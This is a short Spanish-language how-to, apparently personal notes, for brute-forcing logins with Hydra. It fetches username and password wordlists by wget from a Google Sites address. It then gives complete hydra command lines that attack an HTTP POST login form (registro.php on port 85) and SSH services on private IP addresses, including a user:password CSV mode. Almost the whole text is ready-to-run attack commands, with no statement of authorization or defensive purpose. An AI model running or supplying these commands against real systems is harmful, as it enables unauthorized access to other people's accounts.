Ataque por http:
cd /root
wget https://sites.google.com/site/mgomez1974/hydra/usuarios -O usuarios
wget https://sites.google.com/site/mgomez1974/hydra/claves -O claves
wget https://sites.google.com/site/mgomez1974/hydra/passwords.csv -O passwords.csv
mv /root/usuarios /usr/local/bin
mv /root/claves /usr/local/bin
cd /usr/local/bin
rm hydra.restore
hydra -L usuarios -P claves -t 1 -f -v -V 192.168.1.2 -s 85 -o salida.txt http-post-form "/registro.php:codigoUsuario=^USER^&claveUsuario=^PASS^"
-s 85 es el puerto que normelmente debe ser 80 pero se puede cambiar
registro.php es el formulario que hace el logeo del usuario y se obtiene de ver el codigo de la pagina en html y ver donde dice form bla bla bla registro.php o algo asi.
Pilas con esas comillas que coloque porque son indispensables para que el comando corra correctamente.
Ataque por ssh:
cd /root
el mismo procedimiento anterior pero cambia la linea de comando de la hydra:
hydra -L usuarios -P claves -o salida.txt 192.168.1.159 ssh2 -v -e ns
tambien podria ser con archivo separado por comas o cvs que en realidad es usuario:password
hydra 192.168.0.1 ssh2 -v -V -C /passwords.csv -e ns -t 1 -w 10